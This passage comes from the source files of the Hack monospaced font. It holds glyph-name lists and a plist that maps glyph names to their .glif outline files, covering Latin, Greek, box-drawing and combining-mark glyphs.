<string>uni25F2</string> <string>uni25F3</string> <string>uni25FB</string> <string>uni25FC</string> <string>uni25FD</string> <string>uni25FE</string> <string>triagup</string> <string>uni25B6</string> <string>triagdn</string> <string>uni25C0</string> <string>uni25B3</string> <string>uni25B7</string> <string>uni25BD</string> <string>uni25C1</string> <string>uni25EC</string> <string>uni25ED</string> <string>uni25EE</string> <string>triagrt</string> <string>triaglf</string> <string>uni25BB</string> <string>uni25C5</string> <string>uni25B4</string> <string>uni25B8</string> <string>uni25BE</string> <string>uni25C2</string> <string>uni25B5</string> <string>uni25B9</string> <string>uni25BF</string> <string>uni25C3</string> <string>uni25E5</string> <string>uni25E2</string> <string>uni25E3</string> <string>uni25E4</string> <string>uni25F9</string> <string>uni25FF</string> <string>uni25FA</string> <string>uni25F8</string> <string>uni2501</string> <string>uni2503</string> <string>uni2504</string> <string>uni2505</string> <string>uni2506</string> <string>uni2507</string> <string>uni2508</string> <string>uni2509</string> <string>uni250A</string> <string>uni250B</string> <string>uni250D</string> <string>uni250E</string> <string>uni250F</string> <string>uni2511</string> <string>uni2512</string> <string>uni2513</string> <string>uni2515</string> <string>uni2516</string> <string>uni2517</string> <string>uni2519</string> <string>uni251A</string> <string>uni251B</string> <string>uni251D</string> <string>uni251E</string> <string>uni251F</string> <string>uni2520</string> <string>uni2521</string> <string>uni2522</string> <string>uni2523</string> <string>uni2525</string> <string>uni2526</string> <string>uni2527</string> <string>uni2528</string> <string>uni2529</string> <string>uni252A</string> <string>uni252B</string> <string>uni252D</string> <string>uni252E</string> <string>uni252F</string> <string>uni2530</string> <string>uni2531</string> <string>uni2532</string> <string>uni2533</string> <string>uni2535</string> <string>uni2536</string> <string>uni2537</string> <string>uni2538</string> <string>uni2539</string> <string>uni253A</string> <string>uni253B</string> <string>uni253D</string> <string>uni253E</string> <string>uni253F</string> <string>uni2540</string> <string>uni2541</string> <string>uni2542</string> <string>uni2543</string> <string>uni2544</string> <string>uni2545</string> <string>uni2546</string> <string>uni2547</string> <string>uni2548</string> <string>uni2549</string> <string>uni254A</string> <string>uni254B</string> <string>uni254C</string> <string>uni254D</string> <string>uni254E</string> <string>uni254F</string> <string>uni256D</string> <string>uni256E</string> <string>uni256F</string> <string>uni2570</string> <string>uni2571</string> <string>uni2572</string> <string>uni2573</string> <string>uni2574</string> <string>uni2575</string> <string>uni2576</string> <string>uni2577</string> <string>uni2578</string> <string>uni2579</string> <string>uni257A</string> <string>uni257B</string> <string>uni257C</string> <string>uni257D</string> <string>uni257E</string> <string>uni257F</string> <string>bar</string> <string>brokenbar</string> <string>at</string> <string>ampersand</string> <string>paragraph</string> <string>copyright</string> <string>registered</string> <string>section</string> <string>trademark</string> <string>degree</string> <string>asciicircum</string> <string>dagger</string> <string>daggerdbl</string> <string>acutecomb</string> <string>dotbelowcomb</string> <string>gravecomb</string> <string>hookabovecomb</string> <string>tildecomb</string> <string>uni0302</string> <string>uni0304</string> <string>uni0305</string> <string>uni0306</string> <string>uni0307</string> <string>uni0308</string> <string>uni030A</string> <string>uni030B</string> <string>uni030C</string> <string>uni030D</string> <string>uni030E</string> <string>uni030F</string> <string>uni0310</string> <string>uni0311</string> <string>uni0312</string> <string>uni0313</string> <string>uni0314</string> <string>uni0315</string> <string>uni0316</string> <string>uni0317</string> <string>uni0318</string> <string>uni0319</string> <string>uni031A</string> <string>uni031B</string> <string>uni031C</string> <string>uni031D</string> <string>uni031E</string> <string>uni031F</string> <string>uni0320</string> <string>uni0321</string> <string>uni0322</string> <string>uni0324</string> <string>uni0325</string> <string>uni0326</string> <string>uni0327</string> <string>uni0328</string> <string>uni0329</string> <string>uni032A</string> <string>uni032B</string> <string>uni032C</string> <string>uni032D</string> <string>uni032E</string> <string>uni032F</string> <string>uni0330</string> <string>uni0331</string> <string>uni0332</string> <string>uni0333</string> <string>uni0334</string> <string>uni0335</string> <string>uni0336</string> <string>uni0337</string> <string>uni0338</string> <string>uni0339</string> <string>uni033A</string> <string>uni033B</string> <string>uni033C</string> <string>uni033D</string> <string>uni033E</string> <string>uni033F</string> <string>uni0358</string> <string>uni0361</string> <string>uni0306.case</string> <string>uni0311.case</string> <string>uni030F.case</string> <string>uni0307.case</string> <string>uni030B.case</string> <string>uni0304.case</string> <string>uni02B9</string> <string>uni02BB</string> <string>uni02BC</string> <string>uni02BD</string> <string>uni02BE</string> <string>uni02BF</string> <string>uni02C0</string> <string>uni02C1</string> <string>uni02C8</string> <string>uni02C9</string> <string>uni02CC</string> <string>uni02CD</string> <string>uni02CE</string> <string>uni02CF</string> <string>uni02D0</string> <string>uni02D1</string> <string>acute</string> <string>breve</string> <string>caron</string> <string>cedilla</string> <string>circumflex</string> <string>dieresis</string> <string>dotaccent</string> <string>grave</string> <string>hungarumlaut</string> <string>macron</string> <string>ogonek</string> <string>ring</string> <string>tilde</string> <string>uni0559</string> <string>A</string> <string>c6459</string> <string>c6460</string> <string>c6461</string> <string>c6462</string> <string>c6469</string> <string>c6471</string> <string>c6473</string> <string>c6478</string> <string>c6479</string> <string>c6476</string> <string>c6477</string> <string>Alpha</string> <string>Beta</string> <string>Gamma</string> <string>Epsilon</string> <string>Zeta</string> <string>Eta</string> <string>Theta</string> <string>Iota</string> <string>Kappa</string> <string>Lambda</string> <string>Mu</string> <string>Nu</string> <string>Xi</string> <string>Omicron</string> <string>Pi</string> <string>Rho</string> <string>Sigma</string> <string>Tau</string> <string>Upsilon</string> <string>Phi</string> <string>Chi</string> <string>Psi</string> <string>uni03A9</string> <string>Alphatonos</string> <string>Epsilontonos</string> <string>Etatonos</string> <string>Iotatonos</string> <string>Omicrontonos</string> <string>Upsilontonos</string> <string>Omegatonos</string> <string>Iotadieresis</string> <string>Upsilondieresis</string> <string>alpha</string> <string>beta</string> <string>gamma</string> <string>delta</string> <string>epsilon</string> <string>zeta</string> <string>eta</string> <string>theta</string> <string>iota</string> <string>kappa</string> <string>lambda</string> <string>nu</string> <string>xi</string> <string>omicron</string> <string>pi</string> <string>rho</string> <string>uni03C2</string> <string>sigma</string> <string>tau</string> <string>upsilon</string> <string>phi</string> <string>chi</string> <string>psi</string> <string>omega</string> <string>iotatonos</string> <string>iotadieresis</string> <string>iotadieresistonos</string> <string>upsilontonos</string> <string>upsilondieresis</string> <string>upsilondieresistonos</string> <string>omicrontonos</string> <string>omegatonos</string> <string>alphatonos</string> <string>epsilontonos</string> <string>etatonos</string> <string>zero.subs</string> <string>one.subs</string> <string>two.subs</string> <string>three.subs</string> <string>four.subs</string> <string>five.subs</string> <string>six.subs</string> <string>seven.subs</string> <string>eight.subs</string> <string>nine.subs</string> <string>uni2155</string> <string>uni2156</string> <string>uni2157</string> <string>uni2158</string> <string>uni2159</string> <string>uni215A</string> <string>uni2150</string> <string>uni2151</string> <string>uni2070</string> <string>uni2074</string> <string>uni2075</string> <string>uni2076</string> <string>uni2077</string> <string>uni2078</string> <string>uni2079</string> <string>guillemotleft</string> <string>guillemotright</string> <string>uni00B5</string> <string>uni2206</string> <string>tonos</string> <string>dieresistonos</string> <string>_1554</string> <string>Aacute</string> <string>Ccircumflex</string> <string>ccircumflex</string> <string>Gcircumflex</string> <string>gcircumflex</string> <string>Hcircumflex</string> <string>hcircumflex</string> <string>Jcircumflex</string> <string>jcircumflex</string> <string>Scircumflex</string> <string>scircumflex</string> <string>Ubreve</string> <string>ubreve</string> <string>uni20B7</string> <string>uni2116</string> <string>uni01A4</string> <string>uni1EBC</string> <string>uni1EBD</string> <string>uni1EF8</string> <string>uni1EF9</string> <string>IJ</string> <string>ij</string> <string>Ldot</string> <string>ldot</string> <string>uni0162</string> <string>uni0163</string> <string>kgreenlandic</string> <string>musicalnote</string> <string>napostrophe</string> <string>uniE0A0</string> <string>uniE0A1</string> <string>uniE0A2</string> <string>uniE0B0</string> <string>uniE0B1</string> <string>uniE0B2</string> <string>uniE0B3</string> <string>uniFEFF</string> </array> </dict> </plist>
Hack/source/Hack-BoldItalic.ufo/metainfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>creator</key> <string>com.schriftgestaltung.GlyphsUFOExport</string> <key>formatVersion</key> <integer>2</integer> </dict> </plist>
Hack/source/Hack-BoldItalic.ufo/glyphs/contents.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>.notdef</key> <string>_notdef.glif</string> <key>A</key> <string>A_.glif</string> <key>AE</key> <string>A_E_.glif</string> <key>Aacute</key> <string>A_acute.glif</string> <key>Abreve</key> <string>A_breve.glif</string> <key>Acircumflex</key> <string>A_circumflex.glif</string> <key>Adieresis</key> <string>A_dieresis.glif</string> <key>Agrave</key> <string>A_grave.glif</string> <key>Alpha</key> <string>A_lpha.glif</string> <key>Alphatonos</key> <string>A_lphatonos.glif</string> <key>Amacron</key> <string>A_macron.glif</string> <key>Aogonek</key> <string>A_ogonek.glif</string> <key>Aring</key> <string>A_ring.glif</string> <key>Atilde</key> <string>A_tilde.glif</string> <key>B</key> <string>B_.glif</string> <key>Beta</key> <string>B_eta.glif</string> <key>C</key> <string>C_.glif</string> <key>CR</key> <string>C_R_.glif</string> <key>Cacute</key> <string>C_acute.glif</string> <key>Ccaron</key> <string>C_caron.glif</string> <key>Ccedilla</key> <string>C_cedilla.glif</string> <key>Ccircumflex</key> <string>C_circumflex.glif</string> <key>Cdotaccent</key> <string>C_dotaccent.glif</string> <key>Chi</key> <string>C_hi.glif</string> <key>D</key> <string>D_.glif</string> <key>Dcaron</key> <string>D_caron.glif</string> <key>Dcroat</key> <string>D_croat.glif</string> <key>E</key> <string>E_.glif</string> <key>Eacute</key> <string>E_acute.glif</string> <key>Ecaron</key> <string>E_caron.glif</string> <key>Ecircumflex</key> <string>E_circumflex.glif</string> <key>Edieresis</key> <string>E_dieresis.glif</string> <key>Edotaccent</key> <string>E_dotaccent.glif</string> <key>Egrave</key> <string>E_grave.glif</string> <key>Emacron</key> <string>E_macron.glif</string> <key>Eng</key> <string>E_ng.glif</string> <key>Eogonek</key> <string>E_ogonek.glif</string> <key>Epsilon</key> <string>E_psilon.glif</string> <key>Epsilontonos</key> <string>E_psilontonos.glif</string> <key>Eta</key> <string>E_ta.glif</string> <key>Etatonos</key> <string>E_tatonos.glif</string> <key>Eth</key> <string>E_th.glif</string> <key>Euro</key> <string>E_uro.glif</string> <key>F</key> <string>F_.glif</string> <key>G</key> <string>G_.glif</string> <key>Gamma</key> <string>G_amma.glif</string> <key>Gbreve</key> <string>G_breve.glif</string> <key>Gcaron</key> <string>G_caron.glif</string> <key>Gcircumflex</key> <string>G_circumflex.glif</string> <key>Gdotaccent</key> <string>G_dotaccent.glif</string> <key>H</key> <string>H_.glif</string> <key>Hbar</key> <string>H_bar.glif</string> <key>Hcircumflex</key> <string>H_circumflex.glif</string> <key>I</key> <string>I_.glif</string> <key>IJ</key> <string>I_J_.glif</string> <key>Iacute</key> <string>I_acute.glif</string> <key>Icircumflex</key> <string>I_circumflex.glif</string> <key>Idieresis</key> <string>I_dieresis.glif</string> <key>Idotaccent</key> <string>I_dotaccent.glif</string> <key>Igrave</key> <string>I_grave.glif</string> <key>Imacron</key> <string>I_macron.glif</string> <key>Iogonek</key> <string>I_ogonek.glif</string> <key>Iota</key> <string>I_ota.glif</string> <key>Iotadieresis</key> <string>I_otadieresis.glif</string> <key>Iotatonos</key> <string>I_otatonos.glif</string> <key>Itilde</key> <string>I_tilde.glif</string> <key>J</key> <string>J_.glif</string> <key>Jcircumflex</key> <string>J_circumflex.glif</string> <key>K</key> <string>K_.glif</string> <key>Kappa</key> <string>K_appa.glif</string> <key>L</key> <string>L_.glif</string> <key>Lacute</key> <string>L_acute.glif</string> <key>Lambda</key> <string>L_ambda.glif</string> <key>Lcaron</key> <string>L_caron.glif</string> <key>Ldot</key> <string>L_dot.glif</string> <key>Lslash</key> <string>L_slash.glif</string> <key>M</key> <string>M_.glif</string> <key>Mu</key> <string>M_u.glif</string> <key>N</key> <string>N_.glif</string> <key>NULL</key> <string>N_U_L_L_.glif</string> <key>Nacute</key> <string>N_acute.glif</string> <key>Ncaron</key> <string>N_caron.glif</string> <key>Ntilde</key> <string>N_tilde.glif</string> <key>Nu</key> <string>N_u.glif</string> <key>O</key> <string>O_.glif</string> <key>OE</key> <string>O_E_.glif</string> <key>Oacute</key> <string>O_acute.glif</string> <key>Ocircumflex</key> <string>O_circumflex.glif</string> <key>Odieresis</key> <string>O_dieresis.glif</string> <key>Ograve</key> <string>O_grave.glif</string> <key>Ohorn</key> <string>O_horn.glif</string> <key>Ohungarumlaut</key> <string>O_hungarumlaut.glif</string> <key>Omacron</key> <string>O_macron.glif</string> <key>Omegatonos</key> <string>O_megatonos.glif</string> <key>Omicron</key> <string>O_micron.glif</string> <key>Omicrontonos</key> <string>O_microntonos.glif</string> <key>Oslash</key> <string>O_slash.glif</string> <key>Oslashacute</key> <string>O_slashacute.glif</string> <key>Otilde</key> <string>O_tilde.glif</string> <key>P</key> <string>P_.glif</string> <key>Phi</key> <string>P_hi.glif</string> <key>Pi</key> <string>P_i.glif</string> <key>Psi</key> <string>P_si.glif</string> <key>Q</key> <string>Q_.glif</string> <key>R</key> <string>R_.glif</string> <key>Racute</key> <string>R_acute.glif</string> <key>Rcaron</key> <string>R_caron.glif</string> <key>Rho</key> <string>R_ho.glif</string> <key>S</key> <string>S_.glif</string> <key>Sacute</key> <string>S_acute.glif</string> <key>Scaron</key> <string>S_caron.glif</string> <key>Scedilla</key> <string>S_cedilla.glif</string> <key>Scircumflex</key> <string>S_circumflex.glif</string> <key>Sigma</key> <string>S_igma.glif</string> <key>T</key> <string>T_.glif</string> <key>Tau</key> <string>T_au.glif</string> <key>Tbar</key> <string>T_bar.glif</string> <key>Tcaron</key> <string>T_caron.glif</string> <key>Theta</key> <string>T_heta.glif</string> <key>Thorn</key> <string>T_horn.glif</string> <key>U</key> <string>U_.glif</string> <key>Uacute</key> <string>U_acute.glif</string> <key>Ubreve</key> <string>U_breve.glif</string> <key>Ucircumflex</key> <string>U_circumflex.glif</string> <key>Udieresis</key> <string>U_dieresis.glif</string> <key>Ugrave</key> <string>U_grave.glif</string> <key>Uhorn</key> <string>U_horn.glif</string> <key>Uhungarumlaut</key> <string>U_hungarumlaut.glif</string> <key>Umacron</key> <string>U_macron.glif</string> <key>Uogonek</key> <string>U_ogonek.glif</string> <key>Upsilon</key> <string>U_psilon.glif</string> <key>Upsilondieresis</key> <string>U_psilondieresis.glif</string> <key>Upsilontonos</key> <string>U_psilontonos.glif</string> <key>Uring</key> <string>U_ring.glif</string> <key>Utilde</key> <string>U_tilde.glif</string> <key>V</key> <string>V_.glif</string> <key>W</key> <string>W_.glif</string> <key>Wacute</key> <string>W_acute.glif</string> <key>Wcircumflex</key> <string>W_circumflex.glif</string> <key>Wdieresis</key> <string>W_dieresis.glif</string> <key>Wgrave</key> <string>W_grave.glif</string> <key>X</key> <string>X_.glif</string> <key>Xi</key> <string>X_i.glif</string> <key>Y</key> <string>Y_.glif</string> <key>Yacute</key> <string>Y_acute.glif</string> <key>Ycircumflex</key> <string>Y_circumflex.glif</string> <key>Ydieresis</key> <string>Y_dieresis.glif</string> <key>Ygrave</key> <string>Y_grave.glif</string> <key>Z</key> <string>Z_.glif</string> <key>Zacute</key> <string>Z_acute.glif</string> <key>Zcaron</key> <string>Z_caron.glif</string> <key>Zdotaccent</key> <string>Z_dotaccent.glif</string> <key>Zeta</key> <string>Z_eta.glif</string> <key>_1554</key> <string>_1554.glif</string> <key>a</key> <string>a.glif</string> <key>aacute</key> <string>aacute.glif</string> <key>abreve</key> <string>abreve.glif</string> <key>acircumflex</key> <string>acircumflex.glif</string> <key>acute</key> <string>acute.glif</string> <key>acutecomb</key> <string>acutecomb.glif</string> <key>adieresis</key> <string>adieresis.glif</string> <key>ae</key> <string>ae.glif</string> <key>agrave</key> <string>agrave.glif</string> <key>alpha</key> <string>alpha.glif</string> <key>alphatonos</key> <string>alphatonos.glif</string> <key>amacron</key> <string>amacron.glif</string> <key>ampersand</key> <string>ampersand.glif</string> <key>angle</key> <string>angle.glif</string> <key>aogonek</key> <string>aogonek.glif</string> <key>approxequal</key> <string>approxequal.glif</string> <key>aring</key> <string>aring.glif</string> <key>arrowboth</key> <string>arrowboth.glif</string> <key>arrowdblboth</key> <string>arrowdblboth.glif</string> <key>arrowdbldown</key> <string>arrowdbldown.glif</string> <key>arrowdblleft</key> <string>arrowdblleft.glif</string> <key>arrowdblright</key> <string>arrowdblright.glif</string> <key>arrowdblup</key> <string>arrowdblup.glif</string> <key>arrowdown</key> <string>arrowdown.glif</string> <key>arrowleft</key> <string>arrowleft.glif</string> <key>arrowright</key> <string>arrowright.glif</string> <key>arrowup</key> <string>arrowup.glif</string> <key>arrowupdn</key> <string>arrowupdn.glif</string> <key>arrowupdnbse</key> <string>arrowupdnbse.glif</string> <key>asciicircum</key> <string>asciicircum.glif</string> <key>asciitilde</key> <string>asciitilde.glif</string> <key>asterisk</key> <string>asterisk.glif</string> <key>asteriskmath</key> <string>asteriskmath.glif</string> <key>at</key> <string>at.glif</string> <key>atilde</key> <string>atilde.glif</string> <key>b</key> <string>b.glif</string> <key>backslash</key> <string>backslash.glif</string> <key>bar</key> <string>bar.glif</string> <key>beta</key> <string>beta.glif</string> <key>block</key> <string>block.glif</string> <key>braceleft</key> <string>braceleft.glif</string> <key>braceright</key> <string>braceright.glif</string> <key>bracketleft</key> <string>bracketleft.glif</string> <key>bracketright</key> <string>bracketright.glif</string> <key>breve</key> <string>breve.glif</string> <key>brokenbar</key> <string>brokenbar.glif</string> <key>bullet</key> <string>bullet.glif</string> <key>c</key> <string>c.glif</string> <key>c6459</key> <string>c6459.glif</string> <key>c6460</key> <string>c6460.glif</string> <key>c6461</key> <string>c6461.glif</string> <key>c6462</key> <string>c6462.glif</string> <key>c6469</key> <string>c6469.glif</string> <key>c6471</key> <string>c6471.glif</string> <key>c6473</key> <string>c6473.glif</string> <key>c6476</key> <string>c6476.glif</string> <key>c6477</key> <string>c6477.glif</string> <key>c6478</key> <string>c6478.glif</string> <key>c6479</key> <string>c6479.glif</string> <key>cacute</key> <string>cacute.glif</string> <key>caron</key> <string>caron.glif</string> <key>carriagereturn</key> <string>carriagereturn.glif</string> <key>ccaron</key> <string>ccaron.glif</string> <key>ccedilla</key> <string>ccedilla.glif</string> <key>ccircumflex</key> <string>ccircumflex.glif</string> <key>cdotaccent</key> <string>cdotaccent.glif</string> <key>cedilla</key> <string>cedilla.glif</string> <key>cent</key> <string>cent.glif</string> <key>chi</key> <string>chi.glif</string> <key>circle</key> <string>circle.glif</string> <key>circlemultiply</key> <string>circlemultiply.glif</string> <key>circleplus</key> <string>circleplus.glif</string> <key>circumflex</key> <string>circumflex.glif</string> <key>colon</key> <string>colon.glif</string> <key>colonmonetary</key> <string>colonmonetary.glif</string> <key>comma</key> <string>comma.glif</string> <key>congruent</key> <string>congruent.glif</string> <key>copyright</key> <string>copyright.glif</string> <key>currency</key> <string>currency.glif</string> <key>d</key> <string>d.glif</string> <key>dagger</key> <string>dagger.glif</string> <key>daggerdbl</key> <string>daggerdbl.glif</string> <key>dcaron</key> <string>dcaron.glif</string> <key>dcroat</key> <string>dcroat.glif</string> <key>degree</key> <string>degree.glif</string> <key>delta</key> <string>delta.glif</string> <key>dieresis</key> <string>dieresis.glif</string> <key>dieresistonos</key> <string>dieresistonos.glif</string> <key>divide</key> <string>divide.glif</string> <key>dkshade</key> <string>dkshade.glif</string> <key>dnblock</key> <string>dnblock.glif</string> <key>dollar</key> <string>dollar.glif</string> <key>dong</key> <string>dong.glif</string> <key>dotaccent</key> <string>dotaccent.glif</string> <key>dotbelowcomb</key> <string>dotbelowcomb.glif</string> <key>dotlessi</key> <string>dotlessi.glif</string> <key>dotmath</key> <string>dotmath.glif</string> <key>e</key> <string>e.glif</string> <key>eacute</key> <string>eacute.glif</string> <key>ecaron</key> <string>ecaron.glif</string> <key>ecircumflex</key> <string>ecircumflex.glif</string> <key>edieresis</key> <string>edieresis.glif</string> <key>edotaccent</key> <string>edotaccent.glif</string> <key>egrave</key> <string>egrave.glif</string> <key>eight</key> <string>eight.glif</string> <key>eight.subs</key> <string>eight.subs.glif</string> <key>element</key> <string>element.glif</string> <key>onedotenleader</key> <string>onedotenleader.glif</string> <key>twodotenleader</key> <string>twodotenleader.glif</string> <key>ellipsis</key> <string>ellipsis.glif</string> <key>emacron</key> <string>emacron.glif</string> <key>Ebreve</key> <string>E_breve.glif</string> <key>ebreve</key> <string>ebreve.glif</string> <key>emdash</key> <string>emdash.glif</string> <key>emptyset</key> <string>emptyset.glif</string> <key>endash</key> <string>endash.glif</string> <key>eng</key> <string>eng.glif</string> <key>eogonek</key> <string>eogonek.glif</string> <key>epsilon</key> <string>epsilon.glif</string> <key>epsilontonos</key> <string>epsilontonos.glif</string> <key>equal</key> <string>equal.glif</string> <key>equivalence</key> <string>equivalence.glif</string> <key>eta</key> <string>eta.glif</string> <key>etatonos</key> <string>etatonos.glif</string> <key>eth</key> <string>eth.glif</string> <key>exclam</key> <string>exclam.glif</string> <key>exclamdbl</key> <string>exclamdbl.glif</string> <key>exclamdown</key> <string>exclamdown.glif</string> <key>exclamdown.case</key> <string>exclamdown.case.glif</string> <key>existential</key> <string>existential.glif</string> <key>f</key> <string>f.glif</string> <key>figuredash</key> <string>figuredash.glif</string> <key>filledbox</key> <string>filledbox.glif</string> <key>filledrect</key> <string>filledrect.glif</string> <key>five</key> <string>five.glif</string> <key>five.subs</key> <string>five.subs.glif</string> <key>fiveeighths</key> <string>fiveeighths.glif</string> <key>florin</key> <string>florin.glif</string> <key>four</key> <string>four.glif</string> <key>four.subs</key> <string>four.subs.glif</string> <key>franc</key> <string>franc.glif</string> <key>g</key> <string>g.glif</string> <key>gamma</key> <string>gamma.glif</string> <key>gbreve</key> <string>gbreve.glif</string> <key>gcaron</key> <string>gcaron.glif</string> <key>gcircumflex</key> <string>gcircumflex.glif</string> <key>gdotaccent</key> <string>gdotaccent.glif</string> <key>germandbls</key> <string>germandbls.glif</string> <key>gradient</key> <string>gradient.glif</string> <key>grave</key> <string>grave.glif</string> <key>gravecomb</key> <string>gravecomb.glif</string> <key>greater</key> <string>greater.glif</string> <key>greaterequal</key> <string>greaterequal.glif</string> <key>guillemotleft</key> <string>guillemotleft.glif</string> <key>guillemotright</key> <string>guillemotright.glif</string> <key>guilsinglleft</key> <string>guilsinglleft.glif</string> <key>guilsinglright</key> <string>guilsinglright.glif</string> <key>h</key> <string>h.glif</string> <key>hbar</key> <string>hbar.glif</string> <key>hcircumflex</key> <string>hcircumflex.glif</string> <key>hookabovecomb</key> <string>hookabovecomb.glif</string> <key>hungarumlaut</key> <string>hungarumlaut.glif</string> <key>hyphen</key> <string>hyphen.glif</string> <key>i</key> <string>i.glif</string> <key>iacute</key> <string>iacute.glif</string> <key>icircumflex</key> <string>icircumflex.glif</string> <key>idieresis</key> <string>idieresis.glif</string> <key>igrave</key> <string>igrave.glif</string> <key>ij</key> <string>ij.glif</string> <key>imacron</key> <string>imacron.glif</string> <key>Ibreve</key> <string>I_breve.glif</string> <key>ibreve</key> <string>ibreve.glif</string> <key>infinity</key> <string>infinity.glif</string> <key>integral</key> <string>integral.glif</string> <key>integralbt</key> <string>integralbt.glif</string> <key>integraltp</key> <string>integraltp.glif</string> <key>intersection</key> <string>intersection.glif</string> <key>invbullet</key> <string>invbullet.glif</string> <key>invcircle</key> <string>invcircle.glif</string> <key>iogonek</key> <string>iogonek.glif</string> <key>iota</key> <string>iota.glif</string> <key>iotadieresis</key> <string>iotadieresis.glif</string> <key>iotadieresistonos</key> <string>iotadieresistonos.glif</string> <key>iotatonos</key> <string>iotatonos.glif</string> <key>itilde</key> <string>itilde.glif</string> <key>j</key> <string>j.glif</string> <key>jcircumflex</key> <string>jcircumflex.glif</string> <key>k</key> <string>k.glif</string> <key>kappa</key> <string>kappa.glif</string> <key>kgreenlandic</key> <string>kgreenlandic.glif</string> <key>l</key> <string>l.glif</string> <key>lacute</key> <string>lacute.glif</string> <key>lambda</key> <string>lambda.glif</string> <key>lcaron</key> <string>lcaron.glif</string> <key>ldot</key> <string>ldot.glif</string> <key>less</key> <string>less.glif</string> <key>lessequal</key> <string>lessequal.glif</string> <key>lfblock</key> <string>lfblock.glif</string> <key>lira</key> <string>lira.glif</string> <key>logicaland</key> <string>logicaland.glif</string> <key>logicalnot</key> <string>logicalnot.glif</string> <key>logicalor</key> <string>logicalor.glif</string> <key>longs</key> <string>longs.glif</string> <key>lozenge</key> <string>lozenge.glif</string> <key>lslash</key> <string>lslash.glif</string> <key>ltshade</key> <string>ltshade.glif</string> <key>m</key> <string>m.glif</string> <key>macron</key> <string>macron.glif</string> <key>minus</key> <string>minus.glif</string> <key>multiply</key> <string>multiply.glif</string> <key>musicalnote</key> <string>musicalnote.glif</string> <key>n</key> <string>n.glif</string> <key>nacute</key> <string>nacute.glif</string> <key>napostrophe</key> <string>napostrophe.glif</string> <key>ncaron</key> <string>ncaron.glif</string> <key>nine</key> <string>nine.glif</string> <key>nine.subs</key> <string>nine.subs.glif</string> <key>notelement</key> <string>notelement.glif</string> <key>notequal</key> <string>notequal.glif</string> <key>notsubset</key> <string>notsubset.glif</string> <key>ntilde</key> <string>ntilde.glif</string> <key>nu</key> <string>nu.glif</string> <key>numbersign</key> <string>numbersign.glif</string> <key>o</key> <string>o.glif</string> <key>oacute</key> <string>oacute.glif</string> <key>ocircumflex</key> <string>ocircumflex.glif</string> <key>odieresis</key> <string>odieresis.glif</string> <key>oe</key> <string>oe.glif</string> <key>ogonek</key> <string>ogonek.glif</string> <key>ograve</key> <string>ograve.glif</string> <key>ohorn</key> <string>ohorn.glif</string> <key>ohungarumlaut</key> <string>ohungarumlaut.glif</string> <key>omacron</key> <string>omacron.glif</string> <key>Obreve</key> <string>O_breve.glif</string> <key>obreve</key> <string>obreve.glif</string> <key>omega</key> <string>omega.glif</string> <key>omegatonos</key> <string>omegatonos.glif</string> <key>omicron</key> <string>omicron.glif</string> <key>omicrontonos</key> <string>omicrontonos.glif</string> <key>one</key> <string>one.glif</string> <key>one.subs</key> <string>one.subs.glif</string> <key>oneeighth</key> <string>oneeighth.glif</string> <key>onehalf</key> <string>onehalf.glif</string> <key>onequarter</key> <string>onequarter.glif</string> <key>openbullet</key> <string>openbullet.glif</string> <key>ordfeminine</key> <string>ordfeminine.glif</string> <key>ordmasculine</key> <string>ordmasculine.glif</string> <key>orthogonal</key> <string>orthogonal.glif</string> <key>oslash</key> <string>oslash.glif</string> <key>oslashacute</key> <string>oslashacute.glif</string> <key>otilde</key> <string>otilde.glif</string> <key>p</key> <string>p.glif</string> <key>paragraph</key> <string>paragraph.glif</string> <key>parenleft</key> <string>parenleft.glif</string> <key>parenright</key> <string>parenright.glif</string> <key>partialdiff</key> <string>partialdiff.glif</string> <key>percent</key> <string>percent.glif</string> <key>period</key> <string>period.glif</string> <key>periodcentered</key> <string>periodcentered.glif</string> <key>perthousand</key> <string>perthousand.glif</string> <key>peseta</key> <string>peseta.glif</string> <key>phi</key> <string>phi.glif</string> <key>pi</key> <string>pi.glif</string> <key>plus</key> <string>plus.glif</string> <key>plusminus</key> <string>plusminus.glif</string> <key>product</key> <string>product.glif</string> <key>propersubset</key> <string>propersubset.glif</string> <key>propersuperset</key> <string>propersuperset.glif</string> <key>proportional</key> <string>proportional.glif</string> <key>psi</key> <string>psi.glif</string> <key>q</key> <string>q.glif</string> <key>question</key> <string>question.glif</string> <key>questiondown</key> <string>questiondown.glif</string> <key>questiondown.case</key> <string>questiondown.case.glif</string> <key>quotedbl</key> <string>quotedbl.glif</string> <key>quotedblbase</key> <string>quotedblbase.glif</string> <key>quotedblleft</key> <string>quotedblleft.glif</string> <key>quotedblright</key> <string>quotedblright.glif</string> <key>quoteleft</key> <string>quoteleft.glif</string> <key>quotereversed</key> <string>quotereversed.glif</string> <key>quoteright</key> <string>quoteright.glif</string> <key>quotesinglbase</key> <string>quotesinglbase.glif</string> <key>quotesingle</key> <string>quotesingle.glif</string> <key>r</key> <string>r.glif</string> <key>racute</key> <string>racute.glif</string> <key>radical</key> <string>radical.glif</string> <key>rcaron</key> <string>rcaron.glif</string> <key>reflexsubset</key> <string>reflexsubset.glif</string> <key>reflexsuperset</key> <string>reflexsuperset.glif</string> <key>registered</key> <string>registered.glif</string> <key>revlogicalnot</key> <string>revlogicalnot.glif</string> <key>rho</key> <string>rho.glif</string> <key>ring</key> <string>ring.glif</string> <key>rtblock</key> <string>rtblock.glif</string> <key>s</key> <string>s.glif</string> <key>sacute</key> <string>sacute.glif</string> <key>scaron</key> <string>scaron.glif</string> <key>scedilla</key> <string>scedilla.glif</string> <key>scircumflex</key> <string>scircumflex.glif</string> <key>section</key> <string>section.glif</string> <key>semicolon</key> <string>semicolon.glif</string> <key>seven</key> <string>seven.glif</string> <key>seven.subs</key> <string>seven.subs.glif</string> <key>seveneighths</key> <string>seveneighths.glif</string> <key>shade</key> <string>shade.glif</string> <key>sigma</key> <string>sigma.glif</string> <key>similar</key> <string>similar.glif</string> <key>six</key> <string>six.glif</string> <key>six.subs</key> <string>six.subs.glif</string> <key>slash</key> <string>slash.glif</string> <key>space</key> <string>space.glif</string> <key>sterling</key> <string>sterling.glif</string> <key>suchthat</key> <string>suchthat.glif</string> <key>summation</key> <string>summation.glif</string> <key>t</key> <string>t.glif</string> <key>tau</key> <string>tau.glif</string> <key>tbar</key> 